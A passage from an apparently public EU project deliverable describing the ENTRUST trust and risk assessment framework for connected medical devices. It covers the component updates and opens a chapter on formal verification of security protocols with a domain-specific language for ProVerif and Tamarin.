

ENTRUST

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D3.3 ENTRUST Trust & Risk Assessment Framework – Final Release

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Abstract	<p>Towards providing operational assurance to organizations belonging to the medical domain, ENTRUST aims to ensure that the trustworthiness level of Connected Medical Devices (CMDs) remains at an acceptable level throughout their operational lifecycle. In this regard, this deliverable is dedicated to the description of the final versions of the components participating in the Trust Assessment process of ENTRUST, focusing on the updates performed compared to their previous versions. First, we focus on the Formal Verification component, and the provision of a Domain Specific Language (DSL) for assisting the creation of verification models. The Attack Simulation and AI-based Misbehaviour Detection component is also described, and evaluation of various types of attacks typically affecting the medical domain. Next, we describe the two newly developed modalities of the Secure Software Update component, namely batching-based scalability features and hierarchical deployment of updates. We then present the action workflow and description of the device authentication flow based on the EAP-PSK protocol. Regarding the Trust Assessment Framework (TAF), we describe the Federated TAF modality and the interplay with the Risk Assessment component. Finally, we present the updated Threat Modelling component leveraging the GROQ model provider for increased efficiency, as well as the Software Verification component based on fuzzing with the application of LLMs. Experimental results are presented for all aforementioned components, thus setting the scene for their evaluation in the context of the use cases in D6.2.</p>		
Keywords	Connected Medical Devices, Threat Modelling, Trust Assessment, Formal Verification, Risk Assessment, Digital Twin, Misbehaviour Detection Secure Software Update, Conformity Certificate, Trust Assessment		

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PU	Public, fully open	X
SEN	Sensitive, confidential to ENTRUST project and Commission Services	

* R: Document, report (excluding the periodic and final reports)

DEM: Demonstrator, pilot, prototype, plan designs

DEC: Websites, patents filing, press & media actions, videos, etc.

OTHER: Software, technical diagram, etc.

DMP: Data Management Plan

Glossary of terms and abbreviations used

Term	Description
AAA	Authentication, Authorization, and Accounting
ABAC	Attribute-based Access Control
ABE	Attribute-based Encryption
ABS	Attribute-based Signatures
ACL	Access Control List
AK	Attestation Key
AOO	Actions on Objectives
APT	Advanced Persistent Threat
ATL	Actual Level of Trust
ATL	Actual Level of Trust
ATT&CK	Adversarial Tactics, techniques & Common Knowledge
BLE	Bluetooth Low Energy
C2	Command and Control
CA	Certification Authority
CEGAR	Counterexample-Guided Abstraction Refinement
CFA	Control-Flow Attestation
CIV	Code Integrity Validation
CMD	Connected Medical Device
CPSs	Cyber-Physical Systems
CVE	Common Vulnerabilities and Exposures
DDoS	Distributed Denial-of-Service attacks
DDRV	Distributed and Decentralized Runtime Verification
DFG	Data Flow Diagram
DID	Domain Identifier
DLT	Distributed Ledger Technology
DNN	Deep Neural Network
DoS	Denial of Service
DT	Digital Twin
EMTs	Emergency Medical Technicians
ENISA	European Network and Information Security Agency
FES	Feel Emotion Sensor
FL	Federated Learning
FV	Formal Verification
FW	Firmware
HDOs	Healthcare Delivery Organizations
HMI	Human-Machine Interface
HRV	Hardware-supported Runtime Verification
ICT	Information and Communications Technology

IDS	Intrusion Detection System
IEC	International Electrotechnical Commission
IETF	Internet Engineering Task Force
IoC	Indicator of Compromise
IoT	Internet of Things
JSON	JavaScript Object Notation
LTL	Linear Temporal Logic
MD	Medical Device
MDR	Medical Devices Regulation
MDSW	Medical Device Software
mHealth	Mobile health
MISP	Malware Information Sharing Platform
MITM	Man-In-The-Middle
ML	Machine Learning
MUD	Manufacturer Usage Descriptions
NIST	National Institute of Standards and Technology
OSN	Online Social Networks
PACS	Picture Archiving and Communication System
PHG	Tellu Personal Health Gateway
PMS	Patient Monitoring Systems
PUF	Physical Unclonable Function
QMS	Quality Management System
QoS	Quality of Service
RA	Risk Assessment
ReLU	Rectified Linear Unit
RoT	Root-of-Trust
RPMS	Remote Patient Monitoring Systems
RTL	Required Level of Trustworthiness
SA	Static Analysis
SBOM	Software Bill of Material
SDL	Secure Development Lifecycle
SL	Subjective Logic
SMT	Satisfiability Modulo Theories
SoS	System of Systems
SPLC	Secure Product Life Cycle
SSI	Self-Sovereign Identity
SSL	Secure Sockets Layer
STRIDE	Spoofing, Tampering, Repudiation, Denial of Service and Elevation of Privilege
SUT	System Under Test
SW	Software

SWaP	Size, Weight, and Power
TAR	Trust Assessment Request
TARA	Threat Agent Risk Assessment
TC	Trusted Component
TDE	Trust Decision Engine
TEE	Trusted Execution Environment
TI	Threat Intelligence
TLEE	Trustworthiness Level Expression Engine
TM	Threat Modelling
TMM	Trust Model Manager
TOE	Target of Evaluation
TSM	Trust Sources Manager
TTP	Tactics, Techniques and Procedures
UID	Unique Initial Identification
UML	Unified Modelling Language
VC	Verifiable Credential
VP	Verifiable Presentation
YANG	Yet Another Next Generation

Executive Summary

One of the core targets of ENTRUST is to *enhance the capability of medical organisations to provide reliable healthcare services by ensuring that the trustworthiness level of Connected Medical Devices (CMDs), as well as the system as a whole, remains at an acceptable level.* To this end, ENTRUST designs and implements a holistic framework that aims to provide operational assurance to CMDs throughout their lifecycle, by covering a wide array of threats and vulnerabilities typically affecting the medical domain, as demonstrated in the threat landscape documented in D2.2 [30]. Thus, the ENTRUST solution covers the entire lifecycle of medical devices and is split into three core phases, namely (i) the **Manufacturing (Design) Phase**, which includes all actions performed at the side of the manufacturer prior to its deployment to the target medical domain, (ii) the **Pre-deployment (Domain-specific) Phase**, which includes all actions after the device leaves the manufacturing floor to be deployed to the domain and prior to its normal operation, and **Runtime Phase**, which entails all actions performed during the normal operation of the CMD. At the core of this process lies the **Trust Assessment Framework (TAF)** of ENTRUST, which aims to ensure that the trustworthiness level of CMDs remains at an acceptable level, by computing their **Actual Trust Level (ATL)** dynamically during runtime and comparing it to their **Required Trust Level (RTL)**. In D3.1 [25], we provided the initial definitions of the TAF, as well as all components participating in the trust assessment process and supporting the trust calculation of the CMD in all aforementioned phases. Here, we expand upon these definitions, and we provide the design details and evaluation results for the final versions of these components.

In Chapter 2, we focus on the **Formal Verification** component, whose purpose is to verify the correctness of the various protocols and processes of ENTRUST before they are synthesised into the actual CMDs prior to their deployment to the target medical domain. To this end, a set of properties that can be formally verified during design-time are defined, while other properties need to be dynamically verified during runtime. In the final version of this component, while we leverage well-established tools such as **ProVerif** and **Tamarin** in order to model and verify these security protocols during design-time, a core innovation of ENTRUST is the provision of a **Domain-Specific Language (DSL)** which enables protocol designers to model and verify their protocols, without requiring knowledge of multiple automated protocol verification tools. In addition, the output of the formal verification process is fed into a **Large Language Model (LLM)**, which enables the interpretation of the results and the suggestion of possible fixes for the security protocol, so that the evaluated properties can be successfully verified. Finally, the operation of this tool is demonstrated through its application on the **Zero-Touch Onboarding (ZTO)** scheme of ENTRUST.

Chapter 3 is dedicated to the **Attack Simulation and AI-based Misbehaviour Detection (AIMDE)** components of ENTRUST, which aim to detect indications of anomalous or unexpected behaviours of CMDs based on the available evidence. These constitute indications of risk, which may be further investigated in order to determine whether they are caused by malicious activities, and to evaluate whether further mitigation actions are required or not. This functions as a **Trust Source** that provides input to the TAF, in order to support the calculation of the ATL of the device. Thus, ENTRUST provides two complementary approaches: (i) **Attack Simulation and Hardware Emulation for CMDs**, which leverages full-system hardware emulation in order to simulate attack scenarios on CMDs in a controlled environment. This

approach relies on the use of QEMU to emulate a Raspberry PI system running its native OS, enabling high-fidelity reproduction of the ARM architecture. This approach can also be extended to emulate other types of devices, both High-end and Low-end, provided a compatible OS image and hardware profile are available. (ii) **Automated Configuration of Unsupervised Anomaly Detection Systems**, which includes performance optimisation through clustering-based unsupervised learning models, well-suited for detecting unknown or evolving threats in unlabelled datasets. This approach systematically identifies robust configurations without requiring a labelled ground truth, thus improving detection accuracy and reducing the need for manual tuning. Here, we assess the automated configuration approach using six distinct datasets, including simulated and time-series log data from actual, real-world applications.

The **Secure Software Update** component of ENTRUST is an integral part of ensuring the security, integrity, and maintainability of software installed on CMDs, which is foundational to both patient safety and healthcare service continuity. Specifically, as outlined in the threat landscape in D2.2 [30], factors such as software malfunction, outdated firmware, or unpatched vulnerabilities may have adverse effects and severe consequences to the ability of CMDs to effectively support patient healthcare. In this regard, Chapter 4 provides details on the final version of the SW Update Component of ENTRUST, which has been updated compared to the previous version focusing on two core tenets: (i) Modern medical ecosystems with large-scale deployments comprising hundreds of CMDs require the capability to deploy updates to multiple devices in a timely and efficient manner. Thus, here we provide **increased scalability through batching and parallel execution capabilities**, which leverage shared contextual characteristics, such as device model, physical location, network topology, or usage patterns, in order to organise CMDs into batches for facilitating the scalable delivery of updates and patches. (ii) In real-world environments, CMDs may not be reachable from the central infrastructure due to security, architectural, or connectivity constraints. For instance, in the context of ENTRUST, low-end sensors (e.g., wearable ECG monitors, Bluetooth-enabled sensors, or USB-connected cameras) are connected to the backend infrastructure via a gateway device. Thus, here we provide **capabilities for the hierarchical deployment of software updates**, considering the architectural deployment of the devices, thus allowing for fine-grained operations such as targeted software updates, contextual risk assessment, and lifecycle management.

Chapter 5 is dedicated to the description of the **device authentication flow** of ENTRUST, which entails the actions required for the registration of the CMDs into the medical domain and the generation of the required cryptographic material for the use of the security enablers of ENTRUST. This process addresses the challenge of verifying new devices in a scalable and secure manner by employing **EAP-PSK (Pre-Shared Key Extensible Authentication Protocol)**, and ensures that only legitimate devices can join the ENTRUST framework and utilise the security enablers of ENTRUST. The initial version of this process has been presented in D3.1 [24] and the final version is presented in this deliverable, incorporating an updated definition of the components involved in the process (e.g., Domain Manager and MUD Manager), the protocols used, and the action workflow. We also provide benchmarking results based on locally performed test, thus setting the scene for the experimentation to be performed in the context of the use cases in D6.2 [29].

As aforementioned, the TAF is the central component of the trust assessment process of the ENTRUST framework, and is responsible for assessing the level of trustworthiness of entities dynamically during runtime, based on the trustworthiness evidence provided by all the available **Trust Sources (TSs)**. In the initial version presented in D3.2 [25], we provided a complete description of the **standalone TAF**, which is executed on the ENTRUST cloud and quantifies the received evidence centrally. Thus, the standalone TAF performs trust assessment based on information it has received, quantified, and assessed locally, and does not incorporate information provided by other TAFs, and does not consider trust information originating from different domains. In Chapter 6, we expand upon the trust assessment capabilities of ENTRUST through the provision of a **Federated TAF**, which also enables trust information with other TAFs and can be used in scenarios where a single node does not have access to the evidence required

for calculating a trust opinion. Thus, the federated TAF enhances the scope of a single, local TAF by exchanging information with other TAFs, thus enabling us to perform more comprehensive trust assessments.

Finally, Chapter 7 is dedicated to the description of the **Threat Modelling and Software Verification** capabilities of ENTRUST. Specifically, considering the extensive and rapidly evolving threat landscape affecting CMDs as documented in D2.2 [30], we leverage **Large Language Models (LLMs)** in order to aggregate threat intelligence information originating from vulnerability, misconfiguration, and threat intelligence feeds, considering such information may arrive in different formats such as natural-language reports, JSON schemas, logs and vulnerability databases. Thus, the ENTRUST approach is able to absorb and normalise this heterogeneous data, in a manner that enables the rapid construction of attack sequences that a human analyst may overlook. Here, we expand upon the initial definition of this component provided in D3.2 [25] by integrating with the **Risk Assessment (RA)** component of ENTRUST in order to reason about attack paths, and by leveraging the **GROQ Model Provider** in order to significantly increase the efficiency and throughput of the process. In addition, we expand upon the initial version of the **Software Verification** component presented in D3.2, and we describe how we are able to detect faults and software bugs by augmenting traditional mutation-based fuzzing with LLMs in order to increase the effectiveness and efficiency of the employed methods.

Overall, this deliverable provides the final versions of all aforementioned components provided by ENTRUST in order to support the overall trust assessment process in the context of the medical domain. For each of these components, we also provide detailed benchmarking and evaluation results, considering them as standalone components. Thus, we have verified the correct and efficient operation of these components and ensured that there are no issues that impede their operation, thus setting the scene for their integration into the domain architectures and their final evaluation in the context of the use cases of ENTRUST, to be documented in D6.2 [29].

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Chapter 1

Introduction

Towards achieving the core target of ENTRUST of *enhancing the capability of medical organisations to provide reliable healthcare services by ensuring that the trustworthiness level of Connected Medical Devices (CMDs), as well as the system as a whole, remains at an acceptable level*, ENTRUST designs and implements a holistic security framework for enabling medical organizations to ensure the secure, reliable, and uninterrupted provision of medical services. In this regard, we need to consider that modern medical organisations may employ large-scale deployments of heterogeneous CMDs, with varying computational capabilities, and subject to a wide array of rapidly-evolving threats and vulnerabilities (as documented in D2.2 [30]). Such systems may be distributed and cooperative, and the different entities belonging to them may depend on the correct provisioning of services or input data from other system entities. Thus, the central component of the ENTRUST solution is the **Trust Assessment Framework (TAF)**, which relies on the collection of **trustworthiness evidence** from various **Trust Sources (TSs)**, and calculates the **Actual Trust Level (ATL)** of the devices considering all available evidence. Note that, based on the **zero-trust paradigm**, this trust cannot be assumed by default, but instead needs to be based on the available evidence and analysis. This deliverable is dedicated to the description of the final versions of all components of the ENTRUST framework that participate in the **Trust Assessment** process, as well as their role and positioning within the overall framework.

As previously outlined in D3.1 [24] and D3.2 [25], for ensuring that the trustworthiness level of a CMD remains at an acceptable level throughout its operational lifecycle, the trust assessment process of ENTRUST entails the calculation of the **Required Trust Level (RTL)** of CMDs based on the identified threats and vulnerabilities, the available security enablers and mitigation measures, as well as the likelihood and impact associated with each of them. Then, during runtime, the TAF is responsible for the runtime trust evaluation and calculation of the ATL of the devices based on evidence from all TSs, supported by the information collected by the available tracing mechanisms of ENTRUST (described in D5.1 [32]), in order to attest to the correctness of a set of **trustworthiness properties** of the device. Then, a **Trust Decision** is made depending on whether the ATL exceeds the RTL and, if it does, the device is considered trustworthy. Otherwise, mitigation measures may need to be applied for addressing any identified vulnerabilities (e.g., in the form of a **secure software update**).

As aforementioned, the ENTRUST framework aims to cover the entire lifecycle of the CMD, starting from its initial conception, its construction by the Manufacturer, and its actual operation within the target medical domain. Thus, the action workflow of ENTRUST can be split into three distinct phases: (i) the **Manufacturing (Design-time) Phase**, which includes all actions taken at the side of the Manufacturer until the device leaves the manufacturing floor, (ii) the **Pre-deployment (Domain-specific) Phase**, which includes actions taken after the device leaves the manufacturing floor and before its actual operation of the device within the domain infrastructure, and (iii) the **Runtime Phase**, which includes all actions taken during the actual operation of the device. In this regard, **the Trust Assessment process entails a**

variety of actions that take place in all three phases of the ENTRUST action workflow, and pertain to various aspects of the calculation of the RTL and ATL, as well as the identification of the appropriate mitigation measures in case the device is found to be in an untrustworthy state. This deliverable builds upon the initial definitions of these components provided in D3.1 [24] and D3.2 [25], and provides the final definitions of these components, thus setting the scene for their integration of the actual use case infrastructures and their evaluation in the context of the use cases, to be documented in D6.2 [29].

To provide a better overview of the positioning of all components to be analysed in this deliverable, we provide a high-level overview of all three core phases of the ENTRUST framework, which has been described in detail in D2.2 [30]. Specifically, during the **Manufacturing Phase**, after the initial conceptualization and implementation of the medical device, the Manufacturer specifies an initial set of known threats and vulnerabilities, as well as known mitigation measures to address them. The **Threat Modelling** component (Chapter 7) is responsible for gathering and aggregating threat intelligence information from well-established databases, such as the **NIST National Vulnerability Database (NVD)** and the **MITRE Common Weakness Enumeration (CWE)**, and uses a Large Language Model (LLM) approach for their aggregation and processing. This component closely collaborates with the **Risk Assessment (RA)** component in order to also consider the potential attack paths that may occur within the architecture, and leverages the GROQ model provider in order to achieve fast and efficient processing. The **Formal Verification** component (Chapter 2) mathematically verifies the software stack of the device leveraging the well-established ProVerif and Tamarin Tools in order to ensure that a set of design-time properties are verifiably correct, and provides a *Domain-Specific Language (DSL)* in order to enable protocol developers to easily model their schemes to be formally verified. Based on all the above, the **Risk Assessment** component (Chapter 6) performs an initial calculation of the RTL of the device, and the device-level Manufacturer Usage Description (MUD) file of the device is constructed, containing information that can be used in order to execute the specified security (attestation) measures for addressing the identified vulnerabilities.

The **Pre-deployment (Domain-specific) Phase** entails the connection of the device to the infrastructure of the domain where it is intended to operate, and is henceforth referred to as a **Connected Medical Device (CMD)**. During this phase, the device is **authenticated**, **onboarded**, and **enroled** into the domain, following processes which are detailed in D4.2 [26]. In the context of the Trust Assessment process, *the RTL of the device is updated by the RA component based on domain-specific information*. Specifically, the RA updates the risk calculation for the CMD considering interdependencies with other entities. Then, the **Formal Verification** component is also able to perform an updated verification perform re-evaluation considering domain-specific requirements as constraints, and potentially identify new vulnerabilities based on these new requirements. In addition, the Digital Twin emulates the domain-specific threats, which may have been identified by the System Administrator. Finally, the Device-level MUD is extended into a Domain-level eMUD, containing the domain-specific threat vector considering newly identified threats, associated with the appropriate mitigation measures.

The **Runtime Phase** entails the normal operation of the CMD as part of the domain infrastructure, as well as all actions taken by the ENTRUST framework in order to ensure that its trustworthiness level remains at an acceptable level. Specifically, this entails the collection of **trustworthiness evidence** by all available **Trust Sources (TSs)**, and these are then provided to the TAF (Chapter 6) so that it can evaluate the ATL of the device and, thus, determine whether the device is in a trustworthy state or not. The provided TSs include a set of **Remote Attestation (RA)** enablers (described in D4.2 [31]), whose execution require the collection of **trust evidence** on a set of **trust properties**, leveraging the tracing capabilities of the CMD. In addition, the **Attack Simulation and AI-based Misbehaviour Detection** component of ENTRUST (Chapter 3) is responsible for detecting unexpected behaviours of the device, based on two complementary approaches, namely (i) attack simulation and hardware emulation for CMDs, and (ii) automated configuration of unsupervised anomaly detection systems. Following the processing of this

information by the TAF, if the ATL exceeds the RTL, the device is considered to be trustworthy. Otherwise, this constitutes an **Indication of Risk** that signifies the need for further action. In this case, the **Secure Software/Firmware Update** component (Chapter 4) is responsible for deploying an update or patch in a secure manner, in order to mitigate any identified vulnerabilities. Note that the final version of this component provides enhanced scalability features for application in large-scale medical domain infrastructures, as the capability to consider hierarchical architectural deployments.

Throughout the remainder of this deliverable, we will provide descriptions for the final versions of all aforementioned components, their design and their implementation, as well as their positioning and role within the ENTRUST framework. Note that, for each of these components, we provide detailed benchmarking results, in order to *verify the correctness of their operation, as well as their ability to provide the required results in a timely and efficient manner*. Thus, all components provided in this deliverable have been tested in a manner that ensures that they are ready to be integrated into actual domain infrastructures, and for the final experimental and evaluation activities can be performed and documented as part of D6.2 [29].

1.1 Updates in the Final Versions of the Technical Components

As aforementioned, this deliverable is dedicated to the description of the final versions of the components participating in the trust assessment process of ENTRUST, building upon their initial definitions provided in D3.1 [24] and D3.2 [25]. In Table 1.1, we provide a list of the components analysed in this deliverable, as well as a summary of the updates performed in their final versions compared to their previous iterations.

Component	Description of Updates
Formal Verification	In the final version of the Formal Verification component, documented in Chapter 2, we provide a Domain-Specific Language (DSL) which enables protocol designers to model and verify their protocols without requiring technical knowledge of multiple automated protocol verification tools. The DSL allows the generation of ProVerif and Tamarin models, two well-established and widely used tools for formal verification. The output of the formal verification process is fed into a Large Language Model (LLM), which interprets them to identify whether there are any weakness or vulnerabilities in the verified protocol, and to generate possible fixes for any identified issues, by highlighting the sequence of messages that led to the problem and suggesting changes that would lead to the successful verification of the concerned security properties. We also demonstrate the formal verification methodology on the Zero-Touch Onboarding (ZTO) scheme of ENTRUST, by providing detailed ProVerif and Tamarin models for all sub-phases, and ensuring that all security properties are verified.
Attack Emulation and AI-based Misbehaviour Detection	In Chapter 3, we provide a detailed description of the final architecture of the Attack Emulation and AI-based Misbehaviour Detection component, which comprises two core approaches: (i) Attack simulation and hardware emulation for CMDs . In this approach, we leverage full-system hardware emulation in order to simulate attack scenarios on CMDs in a controlled environment, leveraging the threat landscape identified for CMDs in the context of D2.2 [30]. To this end, we utilise QEMU for the emulation of a Raspberry Pi system, enabling high-fidelity reproduction of the ARM architecture. This approach can also be extended to other high-end and low-end devices, given a compatible OS and hardware profile. (ii) Automated configuration of unsupervised anomaly detection systems . With this approach, we optimise the performance of unsupervised anomaly detection systems, by targeting clustering-based unsupervised learning models in unlabeled datasets, i.e., collections of data that lack predefined class or category annotations (meaning that no ground truth is available). We combine these two approaches in order to form a cohesive framework for improving the security of CMDs, and we evaluated this approach by assessing six datasets, including both simulated and actual time-series log data.

Secure Software Update	<p>In Chapter 4, we expand upon the initial definition of the Secure Software Update component, and we provide additional functionalities and enhancements in two core directions: (i) We enhance the capability for software updates in large-scale medical environments through introducing enhanced scalability features, which leverages contextual characteristics such as device models, physical location, network topology, or usage pattern, in order to organise devices into batches and deploy simultaneous updates in a manner that alleviates drawbacks of sequential update deployment (e.g., inefficient execution, excessive network load, potential downtime). (ii) Enhancements in the capability to consider the hierarchical structure of the domain in the deployment of software updates, such as the connection of Low-end devices (e.g., medical sensors) to a High-end gateway, which then forwards the received data to the hospital backend. This approach introduces various benefits, such as connectivity bridging (reachability of updates for low-end devices), load balancing and distribution among proxy devices, resilience against faults, and contextual enforcements based on physical topology. The implemented features are evaluated through detailed benchmarking activities, where the efficiency and performance of the scheme are measured.</p>
Protection Profiles	<p>In Chapter 5, we provide a detailed description of the final device authentication flow which enables only legitimate devices to join the medical domain, and enable CMDs to access and utilise the security enablers provided by ENTRUST. This approach was initially documented in D3.1 [24] and employs the EAP-PSK (Pre-Shared Key Extensible Authentication Protocol) for verifying devices in a scalable and secure manner. The final version of this process incorporates an updated definition of the components involved in the process (e.g., Domain Manager and MUD Manager), the protocol used, the final sequence diagram and action workflow, as well as the evaluation plan. We also provide preliminary benchmarking results for all phases of the protocol, serving as a foundation for the evaluation in the context of the use cases to be documented in D6.2 [29].</p>
Trust Assessment Framework	<p>In the initial version of the standalone TAF provided in D3.2 [25], we provided a detailed description of the entire trust assessment methodology, considering the reception of trustworthiness evidence of all Trust Sources and the mathematical processes behind the calculation of the ATL of the device, thus leading to the extraction of a Trust Decision on whether the device can be considered trustworthy or not. Here, in Chapter 6, we expand upon this approach by describing the Federated TAF, which has the same capabilities as the standalone TAF, but also enables exchanging information with other TAFs. This is particularly useful in cases where a single node does not have access to the relevant evidence necessary for calculating a trust opinion. Thus, the federated TAF concept enhances the scope of a single, local TAF by exchanging information with other TAFs and enabling more comprehensive trust assessments. We also provide detailed evaluation results, highlighting the performance and efficiency of this component in performing such trust assessments.</p>
Threat Modelling and Software Verification	<p>In D3.2 [25], we presented the initial version of the Threat Modelling and Software Verification component, using LLMs in order to formulate the threat landscape based on existing threat and vulnerability databases. Here, in Chapter 7 we expand upon this approach, and we leverage the GROQ Model Provider, whose high-performance tensor streaming architecture and pre-trained models offer significant speed and performance improvements over traditional model providers. This is verified through experimental results, that demonstrate large performance improvements over the previous version of the component. Next, we describe how we leverage Apache Kafka for scalable, low-latency event streaming. Finally, we detail the integration of the component with the Risk Assessment, demonstrating how synchronous polling and asynchronous event-driven pipelines interact with the Risk Assessment API to compute multi-stage attack paths across the network topology. With regards to the Software Verification component, we describe how we augment traditional mutation-based fuzzing with LLMs for generating intelligent seed inputs, and we evaluated our methodology by applying AFL++ in conjunction with Renode-based hardware emulation to ZephyrOS binaries, demonstrating its effectiveness at uncovering faults and achieving deep coverage of RTOS components.</p>

Table 1.1: Summary of updates in all technical components described in D3.3

1.2 Relation to Other WPs and Deliverables

Figure 1.1 depicts the relationship of this deliverable with other Work Packages (WPs), as well as other tasks in the same WP(3). As aforementioned, the main purpose of this deliverable is to provide information on the design and implementation of the components of the ENTRUST framework that participate

in the Trust Assessment process of ENTRUST, building upon the versions of these components documented in D3.1 [24] and D3.2 [25], enhancing them with additional features and demonstrating their correctness and evaluating their performance. This deliverable takes input from the final reference architecture provided in D2.2 [30] and positions all concerned components within this architecture, while presenting the necessary refinements following the progress of the implementation process of the participating components.

D4.2 [26] provides details on the Remote Attestation schemes of ENTRUST, whose execution entails the collection of the required trust evidence for attesting to the correctness of the specified set of trust properties. Thus, these schemes provide input to the Trust Assessment Framework (TAF) of ENTRUST, whose final version is provided in this deliverable for the evaluation of the trustworthiness level of a CMD. The tracing mechanisms implemented in the CMDs for the collection of the aforementioned evidence are detailed in D5.1 [27], which also provides information on the Blockchain Infrastructure where relevant information is stored (Conformity Certificates, Trust Policies). All technical components have been verified to be ready for integration with all use case infrastructures, thus the evaluation of the components designed and developed as part of WP3 will be performed in the context of WP6, and their final evaluation in the context of all use case demonstrators will be documented in D6.2 [29].

Figure 1.1: Relations of D3.3 with other WPs and deliverables.

1.3 Deliverable Structure

The remainder of this deliverable is structured as follows:

In **Chapter 2**, we provide the final version of the Formal Verification component, including the definition of the DSL, and the application of the implemented approach on the ZTO scheme of ENTRUST.

In **Chapter 3**, we describe the Attack Emulation and AI-based Misbehaviour Detection component, focused on the dual approach based on attack simulation and hardware emulation for CMDs, as well as automated configuration of unsupervised anomaly detection. We also provide evaluation results of the given method.

In **Chapter 4**, we detail the final version of the Secure Software Update component, including the enhancements in the scalability and hierarchical deployment of updates, as well as detailed benchmarking results.

In **Chapter 5**, we detail the final version of the device authentication flow based on the EAP-PSK scheme, including the final action workflow and detailed benchmarking results.

In **Chapter 6**, we provide the final version of the TAF, focusing on the federated TAF and its capability to exchange information with other TAFs, and we demonstrate its effectiveness through experimental results.

In **Chapter 7**, we describe the Threat Modelling approach including the integration of the GROQ model provider, as well as the updated Software Verification with enhancement of mutation-based fuzzing with LLMs, and we provide detailed experimental results.

Chapter 8 concludes the deliverable.

Chapter 2

Formal Verification

The ENTRUST framework designs and implements a variety of security processes, aiming to ensure the provision of runtime operational assurance to CMDs, and the medical domain as a whole, throughout their operational lifecycle. To this end, the **Formal Verification** component is a core aspect of ENTRUST, which *aims to verify the correctness of these processes based on the fulfilment of the overarching security processes and security properties*. This is in line with the concept of **zero-trust** (i.e., "never trust, always verify"), where no process or entity is considered trusted by default, and needs to prove its trustworthiness in a verifiable manner. Thus, To ensure security requirements are maintained throughout the complete CMD lifecycle, we must implement verification processes at critical phases: design time, pre-deployment, and runtime as defined in Deliverable 2.2 [30]. The goal is to verify the **confidentiality**, **integrity**, and **authentication** (as defined in Table 2.1) of the processes running at these phases as part of the ENTRUST framework. While some of the properties can be verified at design time, others (such as continuous authentication and authorization) need to be attested during runtime. To achieve this, we use various tools and technologies.

Even though the security protocols have been modelled and verified at design time using ProVerif and Tamarin (see Section 2.4), we propose a **Domain-Specific Language (DSL)** that enables the protocol designers to model and verify their protocols without requiring knowledge of multiple automated protocol verification tools (see Section 2.2). This DSL allows for the generation of ProVerif and Tamarin models, two widely used tools for formal verification.

Furthermore, the output of the verification needs to be interpreted to ensure that the protocol does not have any security problems identified. The verification results are fed into a **Large Language Model (LLM)** to be interpreted and to generate possible fixes for the security protocol (highlight the sequence of messages that lead to the problem and suggest changes such that the security requirement holds). *Since not all security properties can be verified at design time, and we need to ensure the correct implementation of the protocol, we aim to perform runtime verification*. First, the security properties to be verified at runtime are extracted from the DSL, and the requirements, then we perform network sniffing on the devices' network to retrieve the state of each device during various phases. For instance, during the Zero-Touch Onboarding (ZTO), the devices are using REST API calls from which we can retrieve the state of a device and ensure that the flow of the messages conforms to the security protocol designed. This step can be performed during the pre-deployment phase by emulating the devices. This allows us to deploy the actual software on the emulated device, run the security protocols, and perform verification at both pre-deployment and runtime operation of the device.

Figure 2.1: Formal Verification Pipeline

2.1 Compositional Formal Verification in ENTRUST

Figure 2.1 depicts the components of the Formal Verification component and the interactions between them. The process begins with designing a security protocol and defining its security requirements. These are retrieved from deliverables of WP2 and WP4, where the ENTRUST reference architecture and security protocols are defined. This way, we model the behaviour of the actors defined in the security protocols with regard to the components presented in the reference architecture. *The protocol is then modelled using a DSL that automatically generates ProVerif and Tamarin verification models.* These models undergo formal verification, and an LLM interprets the results, suggesting protocol modifications if any attacks are discovered. Based on the security requirements and protocol model, runtime security properties are generated (such as continuous authentication and authorization) and integrated into the runtime verification module. During operation, network monitoring of the CMDs captures each device’s state, enabling continuous verification that the protocol implementation adheres to its design specification and maintains the established security requirements throughout execution.

The remainder of this chapter is organized as follows: Section 2.2 explains the idea of using Domain-Specific Language for the specification and verification of security protocols. Section 2.3 describes the threat model and security requirements used for verifying the Zero-Touch Onboarding (ZTO) protocol. Next, Section 2.4, presents the ZTO first as a sequence diagram, and then modeled in ProVerif and Tamarin. Finally, the chapter concludes with Section 2.6 describing the next steps and future work.

2.2 Domain-Specific Language for Specification and Verification of Security Protocols

Formal verification methods offer an organized approach to uncovering flaws in protocols, which is essential in crafting security protocols. Numerous automated tools for verifying security protocols exist in the literature, including ProVerif [9], Tamarin [51], and Scyther [17]. Utilizing automated verification tools for security protocols often demands specialized knowledge for effective use, with each tool possessing distinct abilities and constraints. As a result, users must acquire in-depth knowledge of multiple tools to thoroughly and formally verify the security of their protocols. Moreover, developers of the automated verification tools often have a formal verification background and might have a different approach than protocol designers, who often have a security background. Therefore, this usually leads to the need to gain formal verification expertise to be able to model security protocols because these tools require

precise formal models of protocols, often in custom languages based on formal logic.

ProVerif translates the models of security protocols into Horn clauses to analyze violations of the specified properties [9]. Tamarin uses first-order logic to specify security properties and temporal logic to reason about event order. First-order logic allows expressing properties about data and relationships using quantifiers, which Tamarin uses to specify security goals. Furthermore, temporal logic adds time-based reasoning. Tamarin uses it to verify the order of events in protocol executions. While ProVerif and Tamarin offer an unbounded number of sessions (the protocol can be executed any number of times), providing a more comprehensive verification, Scyther offers a bounded number of sessions, being efficient mostly for simple protocols. Each verification tool provides means to verify specific security properties. For example, the unlinkability property can be modeled and verified using Tamarin but not with ProVerif. One of the reasons is that Tamarin uses traces that can be used to reason about multiple execution linkability, while ProVerif's abstractions cannot express or analyze these relationships.

We propose a domain-specific language (DSL) that enables protocol designers to model and verify their protocols without requiring knowledge of multiple automated protocol verification tools. On top of this DSL, we propose another level of abstraction that automatically generates models for various security properties to help designers kick off their verification process. By specifying which security property to be verified, and providing the required input variables (such as keys to be checked), the DSL generates relevant queries and constructs to ensure the verification of the properties in these two automated verification tools. Furthermore, based on these models, ProVerif and Tamarin models will be generated to enable protocol designers to verify various security properties by making use of multiple verification tools. In this initial phase, we aim to support only ProVerif code translation for the most common security properties verified in the literature.

We have conducted a literature search to extract ProVerif and Tamarin models published in the past three years using the following search string: *("security" OR "cryptographic") AND "protocol" AND "verification" AND ("tamarin" OR "proverif")*. We use five digital libraries to run our search: IEEE Xplore, ScienceDirect, Scopus, WebOfScience, and ACM Digital Library. The main inclusion/exclusion criteria is that the paper should provide the full ProVerif or Tamarin model. We used these models to extract how the security properties are modelled in the literature and use them as input for the code translation from our DSL to ProVerif. Although there is a variety of protocols identified, the core problem is the same: verify certain security properties, which are often modelled in a similar manner.

Based on our modelling experience, we started defining the language for multiple security properties identified in the literature. Then, we used the ProVerif models as an end goal for our code translation. This translation aims to generate ProVerif code based on the models described using our DSL. Through an iterative process, we implemented the code translation from the least complex model to more complicated models of security properties, introducing new concepts (such as encryption functions, queries, and tables) step by step.

